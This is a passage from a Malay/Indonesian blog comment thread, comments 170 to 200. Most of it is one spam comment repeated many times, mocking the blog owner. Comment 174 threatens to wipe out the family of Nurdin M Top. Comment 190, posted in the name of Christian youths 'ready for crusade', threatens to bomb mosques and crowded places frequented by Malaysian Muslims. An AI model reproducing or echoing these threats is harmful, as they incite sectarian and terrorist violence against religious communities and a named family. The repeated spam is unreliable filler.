    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  170. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  171. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  172. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  173. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  174. KELUARGA NURDIN M TOP AKAN KAMI HABISI !

    ReplyDelete
  175. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  176. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  177. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  178. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  179. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  180. Eva, apa yg aku tahu dan pasti, copycat sialan ini sdg bersorak kegembiraan kerana posting kau sg bersifat amarah dan kami membalas balik! Siapa yg rugi??

    ReplyDelete
  181. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  182. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  183. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  184. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  185. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  186. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  187. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  188. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  189. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  190. Kami umat Christiani sdh jenuh menghadapi teror bom dari teroris krn korban nya melulu umat kami doang.

    KESABARAN ITU ADA BATASNYA !

    Jika kami hendak bergerilya meledakkan bom di mesjid2 atau tempat2 keramaian yg umum dikunjungi oleh umat islam kami sanggup aja, tapi kami masih bersabar.

    Bukan anda saja yg bisa mengirim bom tapi kami juga bisa meledakkan bom yg lebih dahsyat.

    Tapi kenapa pengebom teroris Nurdin M Top dll selalu warga bangsa Malaysia ? KESABARAN ADA BATASNYA. JGN SAMPAI KAMI UMAT KRISTIANI MENGIRIM BOM KE MESJID2 & TEMPAT KERAMAIAN UMAT MUSLIM YG RAMAI DIKUNJUNGI OLEH UMAT ISLAM MALAYSIA.


    DARI : PEMUDA / PEMUDI UMAT CHRISTIANI SIAP PERANG SALIB

    ReplyDelete
  191. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  192. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  193. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  194. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  195. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  196. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  197. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  198. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  199. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete
  200. UNTUK PENGETAHUAN SEMWANYA

    SI PEMILIK BLOG INI DAH KEHABISAN TOPIC,SAYA TAK TAU NAK CAKAP APA LAGI,KENAPA YA SI PEMILIK BLOG INI TIDAK ADA TOPIC LAIN,TERUK BETUL TT SEBENARNYA,SAYA RASA DIA HARUS PERGI KE DOCTOR JIWA DA SKIT JIWA NI. NAK PERLUKAN BANTUAN MY GRN PA DOCTOR DATANG LA KE SINGAPORE.KITE OBAT KAN AWAK MASALA BIYAYA FREE OK.

    ReplyDelete